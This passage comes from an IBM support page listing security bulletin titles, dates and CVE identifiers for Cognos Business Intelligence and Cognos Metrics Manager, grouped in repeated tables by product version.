[Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009441>) \nOctober 2017| [A vulnerability in the Apache Xerces-C XML Parser affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009438>) \nOctober 2017| [Cognos Business Intelligence Server 2017Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22009259>) \nOctober 2017| [A vulnerability in the libpng library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004076>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004070>) \nJune 2017| [Cognos Business Intelligence Server 2017Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22004036>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004078>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004077>) \nMay 2017| [A vulnerability in the GSKit library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004075>) \nMay 2017| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004074>) \nMay 2017| [Cognos Business Intelligence is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www.ibm.com/support/docview.wss?uid=swg22003426>) \nApril 2017| [Vulnerability in IBM WebSphere Application Server affects Cognos Metrics Manager (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21976798>) \nApril 2017| [Multiple vulnerabilities in Apache HttpComponents affect Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)](<http://www.ibm.com/support/docview.wss?uid=swg21970193>) \nMarch 2017| [Multiple vulnerabilities in Apache Tomcat affect Cognos Metrics Manager (CVE-2016-0762, CVE-2016-6816)](<http://www.ibm.com/support/docview.wss?uid=swg21999723>) \nMarch 2017| [A vulnerability in IBM Websphere Application Server affects Cognos Metrics Manager (CVE-2016-5983)](<http://www.ibm.com/support/docview.wss?uid=swg21999722>) \nMarch 2017| [Cognos Business Intelligence Server 2017Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21999671>) \nMarch 2017| [Privilege Escalation vulnerability affects Cognos Business Intelligence (CVE-2016-8960)](<http://www.ibm.com/support/docview.wss?uid=swg21993718>) \nJanuary 2017| [Cognos Business Intelligence is affected by a vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21996809>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21995691>) \nJanuary 2017| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3485)](<http://www.ibm.com/support/docview.wss?uid=swg21995206>) \nJanuary 2017| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2016-3705, CVE-2016-4447, CVE-2016-4448)](<http://www.ibm.com/support/docview.wss?uid=swg21995198>) \nJanuary 2017| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2016-6302 CVE-2016-6304 CVE-2016-6303 CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-6306 CVE-2016-2181 CVE-2016-2183)](<http://www.ibm.com/support/docview.wss?uid=swg21993856>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21984323>) \nOctober 2016| [Cognos Business Intelligence Server 2016Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21979767>) \nJuly 2016| [A vulnerability in the Apache Xerces-C XML parser affects Cognos Metrics Manager (CVE-2016-0729)](<http://www.ibm.com/support/docview.wss?uid=swg21986259>) \nJuly 2016| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21985522>) \nJuly 2016| [A vulnerability in Apache Tomcat affects Cognos Metrics Manager (CVE-2015-5345)](<http://www.ibm.com/support/docview.wss?uid=swg21982821>) \nJuly 2016| [A vulnerability in OpenSSL affects Cognos Metrics Manager (CVE-2016-2106, CVE-2016-2107, CVE-2016-2108)](<http://www.ibm.com/support/docview.wss?uid=swg21977114>) \nMay 2016| [Cognos Business Intelligence Server is affected by CVE-2016-0398](<http://www.ibm.com/support/docview.wss?uid=swg21983247>) \nMay 2016| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7941, CVE-2015-7942, CVE-2015-8035, CVE-2015-8241, CVE-2015-8317)](<http://www.ibm.com/support/docview.wss?uid=swg21977221>) \nMay 2016| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466)](<http://www.ibm.com/support/docview.wss?uid=swg21977134>) \nMarch 2016| [Multiple vulnerabilities in libpng affect Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21976924>) \nFebruary 2016| [Several vulnerabilities in the libpng component of Cognos Business Intelligence Server (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21977053>) \nJanuary 2016| [A vulnerability in the GSKit component of Cognos Business Intelligence Server (CVE-2016-0201)](<http://www.ibm.com/support/docview.wss?uid=swg21975044>) \nJanuary 2016| [A vulnerability in the GSKit component of Cognos Metrics Manager (CVE-2016-0201)](<http://www.ibm.com/support/docview.wss?uid=swg21974810>) \nNovember 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-4872)](<http://www.ibm.com/support/docview.wss?uid=swg21971753>) \nNovember 2015| [Vulnerability in Apache Commons affects Cognos Metrics Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971382>) \nNovember 2015| [Cognos Business Intelligence Server 2015Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21959874>) \nAugust 2015| [Cognos Business Intelligence Sever 2015Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21963468>) \nAugust 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-2625, CVE-2015-4748, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963263>) \nAugust 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0230)](<http://www.ibm.com/support/docview.wss?uid=swg21962903>) \nAugust 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)](<http://www.ibm.com/support/docview.wss?uid=swg21962686>) \nAugust 2015| [Vulnerability in RC4 stream cipher affects Cognos Business Intelligence Server (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21715530>) \nJuly 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Mobile app on Android (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959481>) \nJuly 2015| [Cognos Business Intelligence Sever 2015Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21903752>) \nJuly 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0478, CVE-2015-0488, CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21903565>) \nJuly 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0227)](<http://www.ibm.com/support/docview.wss?uid=swg21903036>) \nJuly 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293)](<http://www.ibm.com/support/docview.wss?uid=swg21902528>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Metrics Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959812>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Business Intelligence (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959671>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Business Intelligence (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21700709>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Metrics Manager (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21697317>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Mobile app on Android (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21883588>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Metrics Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21720187>) \nApril 2015| [Vulnerability exists in GSKit that affects Cognos Metrics Manager (CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701318>) \nApril 2015| [Vulnerability in IBM WebSphere Application Server affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701222>) \nApril 2015| [Vulnerabilities in IBM WebSphere Application Server and GSKit affects Cognos Business Intelligence (CVE-2015-0138, CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701210>) \nApril 2015| [Vulnerability in IBM Runtime Environment Java Technology Edition affects Cognos Business Intelligence Server (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701200>) \nApril 2015| [Vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701192>) \nMarch 2015| [Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg21698818>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0410, CVE-2014-6593)](<http://www.ibm.com/support/docview.wss?uid=swg21698154>) \nMarch 2015| [Multiple vulnerabilities in the Libpng library affect Cognos Metrics Manager (CVE-2015-0973, CVE-2014-9495)](<http://www.ibm.com/support/docview.wss?uid=swg21697296>) \nMarch 2015| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204)](<http://www.ibm.com/support/docview.wss?uid=swg21695694>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2014-3566, CVE-2014-6457)](<http://www.ibm.com/support/docview.wss?uid=swg21691561>) \nFebruary 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2014-4263)](<http://www.ibm.com/support/docview.wss?uid=swg21688596>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Business Intelligence (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693422>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Metrics Manager (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693182>) \nDecember 2014| [Cognos Business Intelligence Server is affected by multiple vulnerabilities (CVE-2014-3566, CVE-2014-6145, CVE-2014-1568, CVE-2014-4263, CVE-2012-5784, CVE-2014-3513, CVE-2014-3567 and CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21692267>) \nDecember 2014| [A vulnerability in the Mozilla Network Security Services (NSS) affects Cognos Metrics Manager (CVE-2014-1568)](<http://www.ibm.com/support/docview.wss?uid=swg21691656>) \nDecember 2014| [A vulnerability in Apache Axis affects Cognos Metrics Manager (CVE-2012-5784)](<http://www.ibm.com/support/docview.wss?uid=swg21691655>) \nDecember 2014| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3567, CVE-2014-3513, CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21689333>) \n \nSecurity bulletins and Alerts for Cognos Busines Intelligence 10.2.1. \n--- \n**Published / Updated**| **Title** \nApril 2018| [Cognos Metrics Manager 2018 Q1 Security Update](<http://www.ibm.com/support/docview.wss?uid=swg22014720>) \nDecember 2017| [Multiple vulnerabilities in Libxml2 affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22011764>) \nDecember 2017| [Cognos Business Intelligence Server 2017Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22007952>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009441>) \nOctober 2017| [A vulnerability in the Apache Xerces-C XML Parser affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009438>) \nOctober 2017| [Cognos Business Intelligence Server 2017Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22009259>) \nOctober 2017| [A vulnerability in the libpng library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004076>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004070>) \nJune 2017| [Cognos Business Intelligence Server 2017Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22004036>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004078>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004077>) \nMay 2017| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004074>) \nMay 2017| [Cognos Business Intelligence is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www.ibm.com/support/docview.wss?uid=swg22003426>) \nApril 2017| [Multiple vulnerabilities in Apache HttpComponents affect Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)](<http://www.ibm.com/support/docview.wss?uid=swg21970193>) \nMarch 2017| [Multiple vulnerabilities in Apache Tomcat affect Cognos Metrics Manager (CVE-2016-0762, CVE-2016-6816)](<http://www.ibm.com/support/docview.wss?uid=swg21999723>) \nMarch 2017| [Cognos Business Intelligence Server 2017Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21999671>) \nMarch 2017| [Privilege Escalation vulnerability affects Cognos Business Intelligence (CVE-2016-8960)](<http://www.ibm.com/support/docview.wss?uid=swg21993718>) \nJanuary 2017| [Cognos Business Intelligence is affected by a vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21996809>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21995691>) \nJanuary 2017| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3485)](<http://www.ibm.com/support/docview.wss?uid=swg21995206>) \nJanuary 2017| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2016-3705, CVE-2016-4447, CVE-2016-4448)](<http://www.ibm.com/support/docview.wss?uid=swg21995198>) \nJanuary 2017| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2016-6302 CVE-2016-6304 CVE-2016-6303 CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-6306 CVE-2016-2181 CVE-2016-2183)](<http://www.ibm.com/support/docview.wss?uid=swg21993856>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21984323>) \nOctober 2016| [Cognos Business Intelligence Server 2016Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21979767>) \nJuly 2016| [A vulnerability in the Apache Xerces-C XML parser affects Cognos Metrics Manager (CVE-2016-0729)](<http://www.ibm.com/support/docview.wss?uid=swg21986259>) \nJuly 2016| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3427)](<http://www.ibm.com/support/docview.wss?uid=swg21985522>) \nJuly 2016| [A vulnerability in Apache Tomcat affects Cognos Metrics Manager (CVE-2015-5345)](<http://www.ibm.com/support/docview.wss?uid=swg21982821>) \nJuly 2016| [A vulnerability in OpenSSL affects Cognos Metrics Manager (CVE-2016-2106, CVE-2016-2107, CVE-2016-2108)](<http://www.ibm.com/support/docview.wss?uid=swg21977114>) \nMay 2016| [Cognos Business Intelligence Server is affected by CVE-2016-0398](<http://www.ibm.com/support/docview.wss?uid=swg21983247>) \nMay 2016| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7941, CVE-2015-7942, CVE-2015-8035, CVE-2015-8241, CVE-2015-8317)](<http://www.ibm.com/support/docview.wss?uid=swg21977221>) \nMay 2016| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466)](<http://www.ibm.com/support/docview.wss?uid=swg21977134>) \nMarch 2016| [Multiple vulnerabilities in libpng affect Cognos Metrics Manager (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21976924>) \nFebruary 2016| [Several vulnerabilities in the libpng component of Cognos Business Intelligence Server (CVE-2015-8126, CVE-2015-8472, CVE-2015-8540)](<http://www.ibm.com/support/docview.wss?uid=swg21977053>) \nNovember 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-4872)](<http://www.ibm.com/support/docview.wss?uid=swg21971753>) \nNovember 2015| [Vulnerability in Apache Commons affects Cognos Metrics Manager (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21971382>) \nNovember 2015| [Cognos Business Intelligence Server 2015Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21959874>) \nAugust 2015| [Cognos Business Intelligence Sever 2015Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21963468>) \nAugust 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-2625, CVE-2015-4748, CVE-2015-4749)](<http://www.ibm.com/support/docview.wss?uid=swg21963263>) \nAugust 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0230)](<http://www.ibm.com/support/docview.wss?uid=swg21962903>) \nAugust 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-1789, CVE-2015-1790, CVE-2015-1792)](<http://www.ibm.com/support/docview.wss?uid=swg21962686>) \nAugust 2015| [Vulnerability in RC4 stream cipher affects Cognos Business Intelligence Server (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21715530>) \nJuly 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Mobile app on Android (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959481>) \nJuly 2015| [Cognos Business Intelligence Sever 2015Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21903752>) \nJuly 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0478, CVE-2015-0488, CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21903565>) \nJuly 2015| [Vulnerability in Tomcat affects Cognos Metrics Manager (CVE-2014-0227)](<http://www.ibm.com/support/docview.wss?uid=swg21903036>) \nJuly 2015| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0293)](<http://www.ibm.com/support/docview.wss?uid=swg21902528>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Metrics Manager (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959812>) \nJune 2015| [Vulnerability in Diffie-Hellman ciphers affects Cognos Business Intelligence (CVE-2015-4000)](<http://www.ibm.com/support/docview.wss?uid=swg21959671>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Business Intelligence (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21700709>) \nMay 2015| [A vulnerability in the IBM Dojo Toolkit affects Cognos Metrics Manager (CVE-2014-8917)](<http://www.ibm.com/support/docview.wss?uid=swg21697317>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Mobile app on Android (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21883588>) \nApril 2015| [Vulnerability in RC4 stream cipher affects Cognos Metrics Manager (CVE-2015-2808)](<http://www.ibm.com/support/docview.wss?uid=swg21720187>) \nApril 2015| [Vulnerabilities in IBM WebSphere Application Server and GSKit affects Cognos Business Intelligence (CVE-2015-0138, CVE-2015-0159)](<http://www.ibm.com/support/docview.wss?uid=swg21701210>) \nApril 2015| [Vulnerability in IBM Runtime Environment Java Technology Edition affects Cognos Business Intelligence Server (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701200>) \nApril 2015| [Vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2015-0138)](<http://www.ibm.com/support/docview.wss?uid=swg21701192>) \nMarch 2015| [Cognos Business Intelligence Server is affected by multiple vulnerabilities](<http://www.ibm.com/support/docview.wss?uid=swg21698818>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2015-0410, CVE-2014-6593)](<http://www.ibm.com/support/docview.wss?uid=swg21698154>) \nMarch 2015| [Multiple vulnerabilities in the Libpng library affect Cognos Metrics Manager (CVE-2015-0973, CVE-2014-9495)](<http://www.ibm.com/support/docview.wss?uid=swg21697296>) \nMarch 2015| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3569, CVE-2014-3570, CVE-2014-3571, CVE-2014-3572, CVE-2014-8275, CVE-2015-0204)](<http://www.ibm.com/support/docview.wss?uid=swg21695694>) \nMarch 2015| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager (CVE-2014-3566, CVE-2014-6457)](<http://www.ibm.com/support/docview.wss?uid=swg21691561>) \nFebruary 2015| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2014-4263)](<http://www.ibm.com/support/docview.wss?uid=swg21688596>) \nJanuary 2015| [TLS padding vulnerability affects Cognos Business Intelligence (CVE-2014-8730)](<http://www.ibm.com/support/docview.wss?uid=swg21693422>) \nDecember 2014| [Cognos Business Intelligence Server is affected by multiple vulnerabilities (CVE-2014-3566, CVE-2014-6145, CVE-2014-1568, CVE-2014-4263, CVE-2012-5784, CVE-2014-3513, CVE-2014-3567 and CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21692267>) \nDecember 2014| [A vulnerability in the Mozilla Network Security Services (NSS) affects Cognos Metrics Manager (CVE-2014-1568)](<http://www.ibm.com/support/docview.wss?uid=swg21691656>) \nDecember 2014| [A vulnerability in Apache Axis affects Cognos Metrics Manager (CVE-2012-5784)](<http://www.ibm.com/support/docview.wss?uid=swg21691655>) \nDecember 2014| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2014-3567, CVE-2014-3513, CVE-2014-3568)](<http://www.ibm.com/support/docview.wss?uid=swg21689333>) \nNovember 2014| [Cognos BI Server is affected by the following vulnerabilities: CVE-2014-0107, CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119, CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21682740>) \nSeptember 2014| [Cognos Business Intelligence is not affected by the Bash vulnerabilities (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and CVE-2014-6278)](<http://www.ibm.com/support/docview.wss?uid=swg21685556>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following IBM Java Runtime vulnerabilities: CVE-2014-0878, CVE-2014-0460](<http://www.ibm.com/support/docview.wss?uid=swg21683527>) \nSeptember 2014| [Cognos Metrics Manager is affected by a vulnerability in Apache Xalan-Java (CVE-2014-0107)](<http://www.ibm.com/support/docview.wss?uid=swg21683524>) \nSeptember 2014| [Cognos Metrics Manager is affected by the following Tomcat vulnerabilities: CVE-2014-0075, CVE-2014-0096, CVE-2014-0099, CVE-2014-0119](<http://www.ibm.com/support/docview.wss?uid=swg21683430>) \nSeptember 2014| [OpenSSL Heartbleed Vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21669823>) \nAugust 2014| [Cognos Metrics Manager is affected by the following OpenSSL vulnerabilities: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21677225>) \nJuly 2014| [Cognos BI Server is affected by the following OpenSSL vulnerability: CVE-2014-0224](<http://www.ibm.com/support/docview.wss?uid=swg21680511>) \nJuly 2014| [Security vulnerabilities have been identified in IBM DB2 shipped with Cognos Business Intelligence (CVE-2013-6747, CVE-2014-0963)](<http://www.ibm.com/support/docview.wss?uid=swg21674489>) \nJuly 2014| [A security vulnerability has been identified in IBM WebSphere Application Server shipped with Cognos Business Intelligence (CVE-2014-0114)](<http://www.ibm.com/support/docview.wss?uid=swg21674099>) \nMay 2014| [Multiple security exposures in Cognos BI Server (CVE-2014- 0416, CVE-2014-0423, CVE-2013-4322)](<http://www.ibm.com/support/docview.wss?uid=swg21671340>) \nMarch 2014| [Multiple security exposures in Cognos BI Server (CVE-2013-6954, CVE-2013-6732, CVE-2013-5802, CVE-2013-5825, CVE-2014-0854, CVE-2014-0861)](<http://www.ibm.com/support/docview.wss?uid=swg21662856>) \nNovember 2013| [Cognos Business Intelligence (CVE-2013-3030, CVE-2013-4002, CVE-2013-2407, CVE-2013-2450, CVE-2013-4034, CVE-2013-5372)](<http://www.ibm.com/support/docview.wss?uid=swg21652590>) \n \nSecurity bulletins and Alerts for Cognos Busines Intelligence 10.2. \n--- \n**Published / Updated**| **Title** \nApril 2018| [Cognos Metrics Manager 2018 Q1 Security Update](<http://www.ibm.com/support/docview.wss?uid=swg22014720>) \nDecember 2017| [Multiple vulnerabilities in Libxml2 affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22011764>) \nDecember 2017| [Cognos Business Intelligence Server 2017Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22007952>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22009441>) \nOctober 2017| [A vulnerability in the Apache Xerces-C XML Parser affects Cognos Metrics Manager.](<http://www.ibm.com/support/docview.wss?uid=swg22009438>) \nOctober 2017| [Cognos Business Intelligence Server 2017Q3 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22009259>) \nOctober 2017| [A vulnerability in the libpng library affects Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004076>) \nOctober 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004070>) \nJune 2017| [Cognos Business Intelligence Server 2017Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg22004036>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004078>) \nMay 2017| [Multiple vulnerabilities in IBM Java Runtime affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004077>) \nMay 2017| [Multiple vulnerabilities in OpenSSL affect Cognos Metrics Manager](<http://www.ibm.com/support/docview.wss?uid=swg22004074>) \nMay 2017| [Cognos Business Intelligence is NOT AFFECTED by the OpenSource Bouncy Castle Vulnerability (CVE-2015-7940)](<http://www.ibm.com/support/docview.wss?uid=swg22003426>) \nApril 2017| [Multiple vulnerabilities in Apache HttpComponents affect Cognos Metrics Manager (CVE-2012-6153, CVE-2014-3577)](<http://www.ibm.com/support/docview.wss?uid=swg21970193>) \nMarch 2017| [Multiple vulnerabilities in Apache Tomcat affect Cognos Metrics Manager (CVE-2016-0762, CVE-2016-6816)](<http://www.ibm.com/support/docview.wss?uid=swg21999723>) \nMarch 2017| [Cognos Business Intelligence Server 2017Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21999671>) \nMarch 2017| [Privilege Escalation vulnerability affects Cognos Business Intelligence (CVE-2016-8960)](<http://www.ibm.com/support/docview.wss?uid=swg21993718>) \nJanuary 2017| [Cognos Business Intelligence is affected by a vulnerability](<http://www.ibm.com/support/docview.wss?uid=swg21996809>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q4 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21995691>) \nJanuary 2017| [A vulnerability in IBM Java Runtime affects Cognos Metrics Manager (CVE-2016-3485)](<http://www.ibm.com/support/docview.wss?uid=swg21995206>) \nJanuary 2017| [Multiple vulnerabilities in libxml2 affect Cognos Metrics Manager (CVE-2016-3705, CVE-2016-4447, CVE-2016-4448)](<http://www.ibm.com/support/docview.wss?uid=swg21995198>) \nJanuary 2017| [Vulnerabilities in OpenSSL affect Cognos Metrics Manager (CVE-2016-6302 CVE-2016-6304 CVE-2016-6303 CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-6306 CVE-2016-2181 CVE-2016-2183)](<http://www.ibm.com/support/docview.wss?uid=swg21993856>) \nJanuary 2017| [Cognos Business Intelligence Server 2016Q2 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21984323>) \nOctober 2016| [Cognos Business Intelligence Server 2016Q1 Security Updater](<http://www.ibm.com/support/docview.wss?uid=swg21979767>) \nJuly 2016| [A vulnerability in the Apache Xerces-C XML parser affects Cognos Metrics Manager 